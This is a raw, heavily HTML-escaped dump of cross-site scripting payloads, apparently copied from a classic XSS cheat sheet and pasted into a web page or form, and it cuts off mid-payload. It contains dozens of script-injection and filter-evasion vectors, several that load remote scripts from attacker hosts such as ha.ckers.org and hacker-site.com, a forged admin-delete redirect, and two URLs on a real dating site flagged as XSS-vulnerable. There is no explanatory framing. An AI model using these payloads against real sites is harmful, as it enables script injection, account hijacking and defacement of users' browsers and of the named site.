/&gt;&lt;script&gt;alert(\\\&#039;xss\\\&#039;);&lt;/script&gt;\\r\\n&lt;script&gt;alert(\\\&quot;XSS by \\\\nxss\\\&quot;)&lt;/script&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\&quot;&gt;&lt;script&gt;alert(\\\&quot;XSS by \\\\nxss\\\&quot;)&lt;/script&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\&#039;\\\&quot;&gt;&lt;/title&gt;&lt;script&gt;alert(\\\&quot;XSS by \\\\nxss\\\&quot;)&lt;/script&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n&lt;img \\\&quot;\\\&quot;\\\&quot;&gt;&lt;script&gt;alert(\\\&quot;XSS by \\\\nxss\\\&quot;)&lt;/script&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n&lt;script&gt;alert(1337)&lt;/script&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\&quot;&gt;&lt;script&gt;alert(1337)&lt;/script&gt;\\\&quot;&gt;&lt;script&gt;alert(\\\&quot;XSS by \\\\nxss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\&#039;\\\&quot;&gt;&lt;/title&gt;&lt;script&gt;alert(1337)&lt;/script&gt;&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n&lt;iframe src=\\\&quot;javascript:alert(\\\&#039;XSS by \\\\nxss\\\&#039;);\\\&quot;&gt;&lt;/iframe&gt;&lt;marquee&gt;&lt;h1&gt;XSS by xss&lt;/h1&gt;&lt;/marquee&gt;\\r\\n\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src=\\\&quot;\\\&quot; alt=\\\&#039;\\r\\n\\\&quot;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src=\\\&quot;\\\&quot; alt=\\\&quot;\\r\\n\\\\\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src=\\\&quot;\\\&quot; alt=\\\\\\\&#039;\\r\\nhttp://www.simpatie.ro/index.php?page=friends&amp;member=781339&amp;javafunctionname=Pageclick&amp;javapgno=2 javapgno=2 ??XSS??\\r\\nhttp://www.simpatie.ro/index.php?page=top_movies&amp;cat=13&amp;p=2 p=2 ??XSS??\\r\\n\\\&#039;); alert(\\\&#039;xss\\\&#039;); var x=\\\&#039;\\r\\n\\\\\\\\\\\&#039;); alert(\\\\\\\&#039;xss\\\\\\\&#039;);var x=\\\\\\\&#039;\\r\\n//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));\\r\\n&gt;\\\&quot;&gt;&lt;ScRiPt%20%0a%0d&gt;alert(561177485777)%3B&lt;/ScRiPt&gt;\\r\\n&lt;img src=\\\&quot;Mario Heiderich says that svg SHOULD not be executed trough image tags\\\&quot; onerror=\\\&quot;javascript:document.write(\\\&#039;\\\\u003c\\\\u0069\\\\u0066\\\\u0072\\\\u0061\\\\u006d\\\\u0065\\\\u0020\\\\u0073\\\\u0072\\\\u0063\\\\u003d\\\\u0022\\\\u0064\\\\u0061\\\\u0074\\\\u0061\\\\u003a\\\\u0069\\\\u006d\\\\u0061\\\\u0067\\\\u0065\\\\u002f\\\\u0073\\\\u0076\\\\u0067\\\\u002b\\\\u0078\\\\u006d\\\\u006c\\\\u003b\\\\u0062\\\\u0061\\\\u0073\\\\u0065\\\\u0036\\\\u0034\\\\u002c\\\\u0050\\\\u0048\\\\u004e\\\\u0032\\\\u005a\\\\u0079\\\\u0042\\\\u0034\\\\u0062\\\\u0057\\\\u0078\\\\u0075\\\\u0063\\\\u007a\\\\u0030\\\\u0069\\\\u0061\\\\u0048\\\\u0052\\\\u0030\\\\u0063\\\\u0044\\\\u006f\\\\u0076\\\\u004c\\\\u0033\\\\u0064\\\\u0033\\\\u0064\\\\u0079\\\\u0035\\\\u0033\\\\u004d\\\\u0079\\\\u0035\\\\u0076\\\\u0063\\\\u006d\\\\u0063\\\\u0076\\\\u004d\\\\u006a\\\\u0041\\\\u0077\\\\u004d\\\\u0043\\\\u0039\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u0069\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u0070\\\\u0062\\\\u0057\\\\u0046\\\\u006e\\\\u005a\\\\u0053\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0045\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0038\\\\u004c\\\\u0032\\\\u006c\\\\u0074\\\\u0059\\\\u0057\\\\u0064\\\\u006c\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u0067\\\\u0062\\\\u0032\\\\u0035\\\\u0073\\\\u0062\\\\u0032\\\\u0046\\\\u006b\\\\u0050\\\\u0053\\\\u004a\\\\u0068\\\\u0062\\\\u0047\\\\u0056\\\\u0079\\\\u0064\\\\u0043\\\\u0067\\\\u0079\\\\u004b\\\\u0053\\\\u0049\\\\u002b\\\\u0050\\\\u0043\\\\u0039\\\\u007a\\\\u0064\\\\u006d\\\\u0063\\\\u002b\\\\u0049\\\\u0043\\\\u0041\\\\u004b\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0048\\\\u004e\\\\u006a\\\\u0063\\\\u006d\\\\u006c\\\\u0077\\\\u0064\\\\u0044\\\\u0035\\\\u0068\\\\u0062\\\\u0047\\\\u0056\\\\u0079\\\\u0064\\\\u0043\\\\u0067\\\\u007a\\\\u004b\\\\u0054\\\\u0077\\\\u0076\\\\u0063\\\\u0032\\\\u004e\\\\u0079\\\\u0061\\\\u0058\\\\u0042\\\\u0030\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0044\\\\u0078\\\\u006b\\\\u005a\\\\u0057\\\\u005a\\\\u007a\\\\u0049\\\\u0047\\\\u0039\\\\u0075\\\\u0062\\\\u0047\\\\u0039\\\\u0068\\\\u005a\\\\u0044\\\\u0030\\\\u0069\\\\u0059\\\\u0057\\\\u0078\\\\u006c\\\\u0063\\\\u006e\\\\u0051\\\\u006f\\\\u004e\\\\u0043\\\\u006b\\\\u0069\\\\u0050\\\\u006a\\\\u0077\\\\u0076\\\\u005a\\\\u0047\\\\u0056\\\\u006d\\\\u0063\\\\u007a\\\\u0034\\\\u0067\\\\u0049\\\\u0041\\\\u006f\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0038\\\\u005a\\\\u0079\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0055\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0067\\\\u0049\\\\u0041\\\\u006f\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0047\\\\u004e\\\\u0070\\\\u0063\\\\u006d\\\\u004e\\\\u0073\\\\u005a\\\\u0053\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0059\\\\u0070\\\\u0049\\\\u0069\\\\u0041\\\\u0076\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u0069\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0049\\\\u0043\\\\u0041\\\\u0038\\\\u0064\\\\u0047\\\\u0056\\\\u0034\\\\u0064\\\\u0043\\\\u0042\\\\u0076\\\\u0062\\\\u006d\\\\u0078\\\\u0076\\\\u0059\\\\u0057\\\\u0051\\\\u0039\\\\u0049\\\\u006d\\\\u0046\\\\u0073\\\\u005a\\\\u0058\\\\u004a\\\\u0030\\\\u004b\\\\u0044\\\\u0063\\\\u0070\\\\u0049\\\\u006a\\\\u0034\\\\u0038\\\\u004c\\\\u0033\\\\u0052\\\\u006c\\\\u0065\\\\u0048\\\\u0051\\\\u002b\\\\u0049\\\\u0043\\\\u0041\\\\u004b\\\\u0049\\\\u0043\\\\u0041\\\\u0067\\\\u0050\\\\u0043\\\\u0039\\\\u006e\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0043\\\\u006a\\\\u0077\\\\u0076\\\\u0063\\\\u0033\\\\u005a\\\\u006e\\\\u0050\\\\u0069\\\\u0041\\\\u0067\\\\u0022\\\\u003e\\\\u003c\\\\u002f\\\\u0069\\\\u0066\\\\u0072\\\\u0061\\\\u006d\\\\u0065\\\\u003e\\\&#039;);\\\&quot;&gt;&lt;/img&gt;\\r\\n&lt;/body&gt;\\r\\n&lt;/html&gt;\\r\\n&lt;SCRIPT SRC=http://hacker-site.com/xss.js&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt; alert(“XSS”); &lt;/SCRIPT&gt;\\r\\n&lt;BODY ONLOAD=alert(\\\&quot;XSS\\\&quot;)&gt;\\r\\n&lt;BODY BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;IMG DYNSRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IMG LOWSRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=”http://hacker-site.com/xss.html”&gt;\\r\\n&lt;INPUT TYPE=\\\&quot;IMAGE\\\&quot; SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;LINK REL=\\\&quot;stylesheet\\\&quot; HREF=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;TABLE BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;TD BACKGROUND=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;)\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;background-image: url(javascript:alert(\\\&#039;XSS\\\&#039;))\\\&quot;&gt;\\r\\n&lt;DIV STYLE=\\\&quot;width: expression(alert(\\\&#039;XSS\\\&#039;));\\\&quot;&gt;\\r\\n&lt;OBJECT TYPE=\\\&quot;text/x-scriptlet\\\&quot; DATA=\\\&quot;http://hacker.com/xss.html\\\&quot;&gt;\\r\\n&lt;EMBED SRC=\\\&quot;http://hacker.com/xss.swf\\\&quot; AllowScriptAccess=\\\&quot;always\\\&quot;&gt;\\r\\n&amp;apos;;alert(String.fromCharCode(88,83,83))//\\\\&amp;apos;;alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\\\\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&amp;apos;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;apos;&amp;apos;;!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}\\r\\n&amp;lt;SCRIPT&amp;gt;alert(&amp;apos;XSS&amp;apos;)&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;BASE HREF=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);//&amp;quot;&amp;gt;\\r\\n&amp;lt;BGSOUND SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;BODY BACKGROUND=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;BODY ONLOAD=alert(&amp;apos;XSS&amp;apos;)&amp;gt;\\r\\n&amp;lt;DIV STYLE=&amp;quot;background-image: url(javascript:alert(&amp;apos;XSS&amp;apos;))&amp;quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=&amp;quot;background-image: url(&amp;amp;#1;javascript:alert(&amp;apos;XSS&amp;apos;))&amp;quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=&amp;quot;width: expression(alert(&amp;apos;XSS&amp;apos;));&amp;quot;&amp;gt;\\r\\n&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;\\r\\n&amp;lt;IFRAME SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;\\r\\n&amp;lt;INPUT TYPE=&amp;quot;IMAGE&amp;quot; SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=javascript:alert(&amp;apos;XSS&amp;apos;)&amp;gt;\\r\\n&amp;lt;IMG DYNSRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG LOWSRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&amp;quot;&amp;gt;\\r\\nRedirect 302 /a.jpg http://victimsite.com/admin.asp&amp;amp;deleteuser\\r\\nexp/*&amp;lt;XSS STYLE=&amp;apos;no\\\\xss:noxss(&amp;quot;*//*&amp;quot;);\\r\\n&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;javascript:alert(&amp;#39;XSS&amp;#39;)&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS\\r\\n&amp;lt;IMG SRC=&amp;apos;vbscript:msgbox(&amp;quot;XSS&amp;quot;)&amp;apos;&amp;gt;\\r\\n&amp;lt;LAYER SRC=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;livescript:[code]&amp;quot;&amp;gt;\\r\\n%BCscript%BEalert(%A2XSS%A2)%BC/script%BE\\r\\n&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0; URL=http://;URL=javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;mocha:[code]&amp;quot;&amp;gt;\\r\\n&amp;lt;OBJECT TYPE=&amp;quot;text/x-scriptlet&amp;quot; DATA=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;\\r\\n&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert(&amp;apos;XSS&amp;apos;)&amp;gt;&amp;lt;/OBJECT&amp;gt;\\r\\n&amp;lt;EMBED SRC=&amp;quot;http://ha.ckers.org/xss.swf&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;\\r\\na=&amp;quot;get&amp;quot;;&amp;amp;#10;b=&amp;quot;URL(&amp;quot;&amp;quot;;&amp;amp;#10;c=&amp;quot;javascript:&amp;quot;;&amp;amp;#10;d=&amp;quot;alert(&amp;apos;XSS&amp;apos;);&amp;quot;)&amp;quot;;&amp;#10;eval(a+b+c+d);\\r\\n&amp;lt;STYLE TYPE=&amp;quot;text/javascript&amp;quot;&amp;gt;alert(&amp;apos;XSS&amp;apos;);&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;IMG STYLE=&amp;quot;xss:expr/*XSS*/ession(alert(&amp;apos;XSS&amp;apos;))&amp;quot;&amp;gt;\\r\\n&amp;lt;XSS STYLE=&amp;quot;xss:expression(alert(&amp;apos;XSS&amp;apos;))&amp;quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;\\r\\n&amp;lt;STYLE type=&amp;quot;text/css&amp;quot;&amp;gt;BODY{background:url(&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;)}&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;@import&amp;apos;http://ha.ckers.org/xss.css&amp;apos;;&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=&amp;quot;Link&amp;quot; Content=&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;BODY{-moz-binding:url(&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;)}&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;TABLE BACKGROUND=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;&amp;gt;&amp;lt;/TABLE&amp;gt;\\r\\n&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;&amp;gt;&amp;lt;/TD&amp;gt;&amp;lt;/TABLE&amp;gt;\\r\\n&amp;lt;HTML xmlns:xss&amp;gt;\\r\\n&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;]]&amp;gt;\\r\\n&amp;lt;XML ID=&amp;quot;xss&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;\\r\\n&amp;lt;XML SRC=&amp;quot;http://ha.ckers.org/xsstest.xml&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;\\r\\n&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;\\r\\n&amp;lt;!--[if gte IE 4]&amp;gt; \\r\\n&amp;lt;META HTTP-EQUIV=&amp;quot;Set-Cookie&amp;quot; Content=&amp;quot;USERID=&amp;lt;SCRIPT&amp;gt;alert(&amp;apos;XSS&amp;apos;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;\\r\\n&amp;lt;XSS STYLE=&amp;quot;behavior: url(http://ha.ckers.org/xss.htc);&amp;quot;&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;!--#exec cmd=&amp;quot;/bin/echo &amp;apos;&amp;lt;SCRIPT SRC&amp;apos;&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;/bin/echo &amp;apos;=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;apos;&amp;quot;--&amp;gt;\\r\\n&amp;lt;? echo(&amp;apos;&amp;lt;SCR)&amp;apos;;\\r\\n&amp;lt;BR SIZE=&amp;quot;&amp;amp;{alert(&amp;apos;XSS&amp;apos;)}&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=JaVaScRiPt:alert(&amp;apos;XSS&amp;apos;)&amp;gt;\\r\\n&amp;lt;IMG SRC=javascript:alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;gt;\\r\\n&amp;lt;IMG SRC=`javascript:alert(&amp;quot;RSnake says, &amp;apos;XSS&amp;apos;&amp;quot;)`&amp;gt;\\r\\n&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;\\r\\n&amp;lt;DIV STYLE=&amp;quot;background-image:\\\\0075\\\\0072\\\\006C\\\\0028&amp;apos;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028.1027\\\\0058.1053\\\\0053\\\\0027\\\\0029&amp;apos;\\\\0029&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;\\r\\n&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;CONTENT-TYPE&amp;quot; CONTENT=&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert(&amp;apos;XSS&amp;apos;);+ADw-/SCRIPT+AD4-\\r\\n\\\\&amp;quot;;alert(&amp;apos;XSS&amp;apos;);//\\r\\n&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\\\&quot;XSS\\\&quot;);&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;@im\\\\port&amp;apos;\\\\ja\\\\vasc\\\\ript:alert(&amp;quot;XSS&amp;quot;)&amp;apos;;&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;jav&amp;#x09;ascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x09;ascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0A;ascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0D;ascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;IMG&amp;#x0D;SRC&amp;#x0D;=&amp;#x0D;&amp;quot;&amp;#x0D;j&amp;#x0D;a&amp;#x0D;v&amp;#x0D;a&amp;#x0D;s&amp;#x0D;c&amp;#x0D;r&amp;#x0D;i&amp;#x0D;p&amp;#x0D;t&amp;#x0D;:&amp;#x0D;a&amp;#x0D;l&amp;#x0D;e&amp;#x0D;r&amp;#x0D;t&amp;#x0D;(&amp;#x0D;&amp;apos;&amp;#x0D;X&amp;#x0D;S&amp;#x0D;S&amp;#x0D;&amp;apos;&amp;#x0D;)&amp;#x0D;&amp;quot;&amp;#x0D;&amp;gt;&amp;#x0D;\\r\\nperl -e &amp;apos;print &amp;quot;&amp;lt;IMG SRC=java\\\\0script:alert(&amp;quot;XSS&amp;quot;)&gt;&amp;quot;;&amp;apos;&amp;gt; out\\r\\nperl -e &amp;apos;print &amp;quot;&amp;amp;&amp;lt;SCR\\\\0IPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCR\\\\0IPT&amp;gt;&amp;quot;;&amp;apos; &amp;gt; out\\r\\n&amp;lt;IMG SRC=&amp;quot; &amp;amp;#14; javascript:alert(&amp;apos;XSS&amp;apos;);&amp;quot;&amp;gt;\\r\\n&amp;lt;SCRIPT/XSS SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\\\\]^`=alert(&amp;quot;XSS&amp;quot;)&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js\\r\\n&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;\\r\\n&amp;lt;IMG SRC=&amp;quot;javascript:alert(&amp;apos;XSS&amp;apos;)&amp;quot;\\r\\n&amp;lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &amp;lt;\\r\\n&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;\\r\\n&amp;lt;SCRIPT&amp;gt;a=/XSS/\\r\\n&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT =&amp;quot;blah&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT a=&amp;quot;blah&amp;quot; &amp;apos;&amp;apos; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT &amp;quot;a=&amp;apos;&amp;gt;&amp;apos;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT a=`&amp;gt;` SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT&amp;gt;document.write(&amp;quot;&amp;lt;SCRI&amp;quot;);&amp;lt;/SCRIPT&amp;gt;PT 